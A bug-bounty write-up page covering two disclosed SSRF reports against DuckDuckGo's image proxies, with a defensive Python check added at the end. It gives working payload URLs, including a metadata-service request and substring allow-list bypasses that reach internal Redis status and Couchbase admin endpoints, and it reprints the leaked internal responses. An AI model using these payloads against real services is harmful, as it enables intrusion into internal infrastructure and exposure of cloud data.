SSRF Write-ups


Last updated 4 years ago


DuckDuckGo - SSRF Access AWS Data

The image_host parameter of the image proxy endpoint is vulnerable to SSRF: the server fetches whatever URL the parameter carries, with no restriction on the destination host. The researcher pointed it at the AWS EC2 instance metadata service. Endpoint and payload:

https://proxy.duckduckgo.com/iur/?f=1&image_host=
https://proxy.duckduckgo.com/iur/?f=1&image_host=http://169.254.169.254/latest/meta-data/

This works against IMDSv1, which answers unauthenticated GET requests from anything running on the instance. IMDSv2 requires a session token obtained with a PUT request and a custom header, which a GET-only SSRF like this one cannot supply, so the metadata service version is worth checking before assuming the same result elsewhere.

Server response (the top-level directory listing of the instance metadata tree):

```
ami-launch-index
ami-manifest-path
block-device-mapping/
hostname
instance-action
instance-id
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/
```

DuckDuckGo - SSRF & XSPA: access to Redis and Couchbase

The researcher found SSRF in the u parameter of the endpoint https://duckduckgo.com/iu?u= . The parameter originally contained http://yimg.com/ , an image URL the server fetches and proxies back. A parameter that carries a full URL like this is a strong indicator of a candidate SSRF sink and should always be tested.

The original request (shown in the report as a curl command) returns HTTP 200.

Changing the u parameter to https://google.com/ is rejected with HTTP 403 Forbidden, so some check on the destination exists.

The researcher worked out that the check only requires the string yimg.com to appear somewhere in the parameter value: it is a substring match on the raw URL, not a comparison against the parsed host. Putting http://yimg.com/ into a query parameter (q) of an attacker-controlled URL therefore satisfies the check while the server fetches the attacker's host. In the report's screenshot the attacker host is a Burp Suite Collaborator domain, and the Collaborator client shows the application both resolving it (DNS) and fetching it (HTTP), confirming a full server-side request rather than a blind one.

The same bypass gives XSPA (cross-site port attack): pointing u at 127.0.0.1 on different ports and comparing the responses, the researcher enumerated internal services listening on the following ports:

22
25
80
443
587
6380 (the local Redis, per the status output below)
6432
6767
6868 (the status endpoint queried below)
8000

The service on port 6868 exposes a status endpoint whose JSON reveals the Redis deployment (a local and a regional Redis URL, both on port 6380, plus the internal hostname cache-services.duckduckgo.com). The researcher URL-encoded the slashes of the path as %2f and appended the yimg.com marker as a query parameter so the substring check still passed:

https://duckduckgo.com/iu/?u=http://127.0.0.1:6868%2fstatus%2f?q=http://yimg.com/

```json
{
  "current_time": "2018-08-23T17:56:06",
  "deployment_environment": "prod",
  "redis_local_last_successful_ping": "2018-08-23T13:56:05",
  "redis_local_url": "redis://127.0.0.1:6380",
  "redis_regional_last_successful_ping": "2018-08-23T13:56:05",
  "redis_regional_url": "redis://cache-services.duckduckgo.com:6380",
  "stat_blocked_ips_removed_since_launch": 8787,
  "stat_blocked_ips_since_launch": 12185,
  "stat_ipset_blocks": 266,
  "stat_redis_local_messages_received": 3613,
  "stat_redis_regional_messages_received": 10211,
  "status": "up"
}
```

The internal host cache-services.duckduckgo.com named in that output also runs Couchbase, and its REST administration API on port 8091 served the bucket listing without credentials. Same bypass, different destination:

https://duckduckgo.com/iu/?u=http://cache-services.duckduckgo.com:8091/pools/default/buckets?q=http://yimg.com/

Response, one bucket object per line. Note "authType":"none" and an empty saslPassword on every bucket, the node's private address 10.0.1.188 and the memcached/direct ports 11210-11214 it exposes; the vBucketMap array, a long run of [0] entries, is trimmed here:

```
[
{"name":"botnet","bucketType":"memcached","authType":"none","saslPassword":"","proxyPort":11213,"replicaIndex":true,"uri":"/pools/default/buckets/botnet?bucket_uuid=573aed7706bb78f1884c01efd0f10911","streamingUri":"/pools/default/bucketsStreaming/botnet?bucket_uuid=573aed7706bb78f1884c01efd0f10911","localRandomKeyUri":"/pools/default/buckets/botnet/localRandomKey","controllers":{"compactAll":"/pools/default/buckets/botnet/controller/compactBucket","compactDB":"/pools/default/buckets/default/controller/compactDatabases","purgeDeletes":"/pools/default/buckets/botnet/controller/unsafePurgeBucket","startRecovery":"/pools/default/buckets/botnet/controller/startRecovery"},"nodes":[{"systemStats":{"cpu_utilization_rate":27.22710163111669,"swap_total":0,"swap_used":0,"mem_total":33737191424,"mem_free":5337153536},"interestingStats":{"cmd_get":492,"couch_docs_actual_disk_size":235428957137,"couch_docs_data_size":135860040563,"couch_spatial_data_size":0,"couch_spatial_disk_size":0,"couch_views_actual_disk_size":0,"couch_views_data_size":0,"curr_items":42313196,"curr_items_tot":39777489,"ep_bg_fetched":26,"get_hits":242,"mem_used":15435536286,"ops":1245,"vb_replica_curr_items":0},"uptime":"17550778","memoryTotal":33737191424,"memoryFree":5337153536,"mcdMemoryReserved":25739,"mcdMemoryAllocated":25739,"replication":1,"clusterMembership":"active","recoveryType":"none","status":"healthy","otpNode":"ns_1@127.0.0.1","thisNode":true,"hostname":"10.0.1.188:8091","clusterCompatibility":262149,"version":"4.5.1-2844-community","os":"x86_64-unknown-linux-gnu","ports":{"proxy":11211,"direct":11210},"services":["kv"]}],"stats":{"uri":"/pools/default/buckets/botnet/stats","directoryURI":"/pools/default/buckets/botnet/statsDirectory","nodeStatsListURI":"/pools/default/buckets/botnet/nodes"},"ddocs":{"uri":"/pools/default/buckets/botnet/ddocs"},"nodeLocator":"ketama","autoCompactionSettings":false,"uuid":"573aed7706bb78f1884c01efd0f10911","replicaNumber":0,"threadsNumber":3,"quota":{"ram":273678336,"rawRAM":273678336},"basicStats":{"quotaPercentUsed":18.58643023903799,"opsPerSec":518,"hitRatio":0.6626984126984127,"itemCount":208856,"memUsed":50867033},"evictionPolicy":"valueOnly","timeSynchronization":"disabled","bucketCapabilitiesVer":"","bucketCapabilities":["cbhello","nodesExt"]},
{"name":"deep","bucketType":"memcached","authType":"none","saslPassword":"","proxyPort":11214,"replicaIndex":true,"uri":"/pools/default/buckets/deep?bucket_uuid=f95b42373da6bd8fdd51c93324229009","streamingUri":"/pools/default/bucketsStreaming/deep?bucket_uuid=f95b42373da6bd8fdd51c93324229009","localRandomKeyUri":"/pools/default/buckets/deep/localRandomKey","controllers":{"compactAll":"/pools/default/buckets/deep/controller/compactBucket","compactDB":"/pools/default/buckets/default/controller/compactDatabases","purgeDeletes":"/pools/default/buckets/deep/controller/unsafePurgeBucket","startRecovery":"/pools/default/buckets/deep/controller/startRecovery"},"nodes":[{"systemStats":{"cpu_utilization_rate":27.22710163111669,"swap_total":0,"swap_used":0,"mem_total":33737191424,"mem_free":5337153536},"interestingStats":{"cmd_get":492,"couch_docs_actual_disk_size":235428957137,"couch_docs_data_size":135860040563,"couch_spatial_data_size":0,"couch_spatial_disk_size":0,"couch_views_actual_disk_size":0,"couch_views_data_size":0,"curr_items":42313196,"curr_items_tot":39777489,"ep_bg_fetched":26,"get_hits":242,"mem_used":15435536286,"ops":1245,"vb_replica_curr_items":0},"uptime":"17550778","memoryTotal":33737191424,"memoryFree":5337153536,"mcdMemoryReserved":25739,"mcdMemoryAllocated":25739,"replication":1,"clusterMembership":"active","recoveryType":"none","status":"healthy","otpNode":"ns_1@127.0.0.1","thisNode":true,"hostname":"10.0.1.188:8091","clusterCompatibility":262149,"version":"4.5.1-2844-community","os":"x86_64-unknown-linux-gnu","ports":{"proxy":11211,"direct":11210},"services":["kv"]}],"stats":{"uri":"/pools/default/buckets/deep/stats","directoryURI":"/pools/default/buckets/deep/statsDirectory","nodeStatsListURI":"/pools/default/buckets/deep/nodes"},"ddocs":{"uri":"/pools/default/buckets/deep/ddocs"},"nodeLocator":"ketama","autoCompactionSettings":false,"uuid":"f95b42373da6bd8fdd51c93324229009","replicaNumber":0,"threadsNumber":3,"quota":{"ram":4116709376,"rawRAM":4116709376},"basicStats":{"quotaPercentUsed":80.05820960337813,"opsPerSec":194,"hitRatio":0.08633093525179857,"itemCount":2326851,"memUsed":3295763821},"evictionPolicy":"valueOnly","timeSynchronization":"disabled","bucketCapabilitiesVer":"","bucketCapabilities":["cbhello","nodesExt"]},
{"name":"services","bucketType":"membase","authType":"none","saslPassword":"","proxyPort":11212,"replicaIndex":false,"uri":"/pools/default/buckets/services?bucket_uuid=06787b1d4c84027860a5f73efb508bff","streamingUri":"/pools/default/bucketsStreaming/services?bucket_uuid=06787b1d4c84027860a5f73efb508bff","localRandomKeyUri":"/pools/default/buckets/services/localRandomKey","controllers":{"compactAll":"/pools/default/buckets/services/controller/compactBucket","compactDB":"/pools/default/buckets/default/controller/compactDatabases","purgeDeletes":"/pools/default/buckets/services/controller/unsafePurgeBucket","startRecovery":"/pools/default/buckets/services/controller/startRecovery"},"nodes":[{"couchApiBase":"http://10.0.1.188:8092/services%2B06787b1d4c84027860a5f73efb508bff","systemStats":{"cpu_utilization_rate":27.22710163111669,"swap_total":0,"swap_used":0,"mem_total":33737191424,"mem_free":5337153536},"interestingStats":{"cmd_get":492,"couch_docs_actual_disk_size":235428957137,"couch_docs_data_size":135860040563,"couch_spatial_data_size":0,"couch_spatial_disk_size":0,"couch_views_actual_disk_size":0,"couch_views_data_size":0,"curr_items":42313196,"curr_items_tot":39777489,"ep_bg_fetched":26,"get_hits":242,"mem_used":15435536286,"ops":1245,"vb_replica_curr_items":0},"uptime":"17550778","memoryTotal":33737191424,"memoryFree":5337153536,"mcdMemoryReserved":25739,"mcdMemoryAllocated":25739,"replication":1,"clusterMembership":"active","recoveryType":"none","status":"healthy","otpNode":"ns_1@127.0.0.1","thisNode":true,"hostname":"10.0.1.188:8091","clusterCompatibility":262149,"version":"4.5.1-2844-community","os":"x86_64-unknown-linux-gnu","ports":{"proxy":11211,"direct":11210},"services":["kv"]}],"stats":{"uri":"/pools/default/buckets/services/stats","directoryURI":"/pools/default/buckets/services/statsDirectory","nodeStatsListURI":"/pools/default/buckets/services/nodes"},"ddocs":{"uri":"/pools/default/buckets/services/ddocs"},"nodeLocator":"vbucket","autoCompactionSettings":false,"uuid":"06787b1d4c84027860a5f73efb508bff","vBucketServerMap":{"hashAlgorithm":"CRC","numReplicas":0,"serverList":["10.0.1.188:11210"],"vBucketMap":[[0],[0],[0],[0], ...trimmed, remaining entries are all [0]... ]},"replicaNumber":0,"threadsNumber":3,"quota":{"ram":14271119360,"rawRAM":14271119360},"basicStats":{"quotaPercentUsed":84.70888041118592,"opsPerSec":533,"diskFetches":26,"itemCount":39777489,"diskUsed":235428957137,"dataUsed":135860040563,"memUsed":12088905432},"evictionPolicy":"valueOnly","timeSynchronization":"disabled","bucketCapabilitiesVer":"","bucketCapabilities":["cbhello","touch","couchapi","cccp","xdcrCheckpointing","nodesExt","dcp"]}
]
```
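The two destination checks the write-ups imply, side by side, as an added example (this is not code from the HackerOne reports or from DuckDuckGo): a substring check of the kind the /iu bypass exploits, and a hardened check that parses the URL, matches the allow-list against the actual host, and rejects any destination that resolves into loopback, link-local or private address space. The in-memory DNS map, the addresses in it, the allow-list contents and the function names are assumptions made for the example; the test URLs are the ones from the reports plus one benign image URL.

```python
"""Added example, not from the reports: a substring allow-list check of the
kind the /iu bypass exploits, next to a hardened check.  The DNS map below
is constructed so the script runs offline; its addresses are assumptions."""
from __future__ import annotations

import ipaddress
from urllib.parse import urlsplit

ALLOWED_HOSTS = frozenset({"yimg.com"})   # assumed allow-list for /iu

# Address space a server-side fetcher must never reach.  The EC2 metadata
# service sits in 169.254.0.0/16; the Couchbase node in the report answered
# on 10.0.1.188, inside 10.0.0.0/8.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16",
    "::1/128", "fc00::/7", "fe80::/10",
)]

# Constructed DNS answers (assumption, not data from the reports).
FAKE_DNS = {
    "yimg.com": ["203.0.113.10"],
    "google.com": ["203.0.113.20"],
    "cache-services.duckduckgo.com": ["10.0.1.188"],
}


def naive_check(url: str) -> bool:
    """The check the researcher bypassed: pass if the allow-listed domain
    appears anywhere in the raw string, e.g. inside a query parameter."""
    return any(h in url for h in ALLOWED_HOSTS)


def fake_resolve(host: str) -> list[str]:
    """Offline stand-in for DNS; IP literals resolve to themselves."""
    try:
        ipaddress.ip_address(host)
        return [host]
    except ValueError:
        return FAKE_DNS.get(host, [])


def is_blocked_ip(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    if addr.is_loopback or addr.is_link_local or addr.is_multicast:
        return True
    return any(addr in net for net in BLOCKED_NETWORKS)


def hardened_check(url: str, allowed_hosts=ALLOWED_HOSTS,
                   resolve=fake_resolve) -> tuple[bool, str]:
    """Decide on the parsed host, never on the raw string.  allowed_hosts=None
    models an open fetcher like /iur, where the address check is the only
    control.  Returns (allowed, reason)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"
    host = parts.hostname
    if not host:
        return False, "no host"
    try:
        parts.port           # ValueError on junk such as '6868%2fstatus%2f'
    except ValueError:
        return False, "malformed port"
    if allowed_hosts is not None and host not in allowed_hosts and not any(
            host.endswith("." + h) for h in allowed_hosts):
        return False, f"host {host!r} not in allow-list"
    addrs = resolve(host)
    if not addrs:
        return False, f"host {host!r} does not resolve"
    for ip in addrs:
        if is_blocked_ip(ip):
            return False, f"{host} resolves to blocked address {ip}"
    return True, "ok"


# The destination URLs from the two reports plus a benign one, as they
# arrive in the image_host / u parameter.
PAYLOADS = {
    "legit":     "http://yimg.com/some/image.jpg",
    "google":    "https://google.com/",
    "metadata":  "http://169.254.169.254/latest/meta-data/",
    "redis":     "http://127.0.0.1:6868%2fstatus%2f?q=http://yimg.com/",
    "couchbase": "http://cache-services.duckduckgo.com:8091/pools/default/buckets?q=http://yimg.com/",
}


def compare() -> dict[str, tuple[bool, bool, bool]]:
    """(naive, hardened with allow-list, hardened open fetcher) per payload."""
    return {
        name: (naive_check(u),
               hardened_check(u)[0],
               hardened_check(u, allowed_hosts=None)[0])
        for name, u in PAYLOADS.items()
    }


if __name__ == "__main__":
    for name, verdicts in compare().items():
        print(f"{name:10} naive={verdicts[0]!s:5} allowlist={verdicts[1]!s:5} "
              f"open={verdicts[2]!s:5} {hardened_check(PAYLOADS[name])[1]}")
```

Run it and the naive column allows both the Redis and the Couchbase payloads while the hardened column rejects them; the third column, the hardened check with no allow-list at all (the situation on the /iur image proxy), still rejects the metadata address and the 10.0.1.188 destination on address range alone. Two caveats apply to any real deployment of this pattern: the fetch that follows must connect to the address that was checked, otherwise a DNS answer that changes between check and use reopens the hole, and every redirect the fetch follows must be re-checked hop by hop.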

Sources (disclosed HackerOne reports):

DuckDuckGo disclosed on HackerOne: SSRF vulnerability on...
DuckDuckGo disclosed on HackerOne: SSRF on duckduckgo.com/iu/

Figures from the reports, not reproduced here: the curl request that returns HTTP 200; the HTTP 403 returned for the rejected URL; the SSRF callback reaching a burpcollaborator subdomain.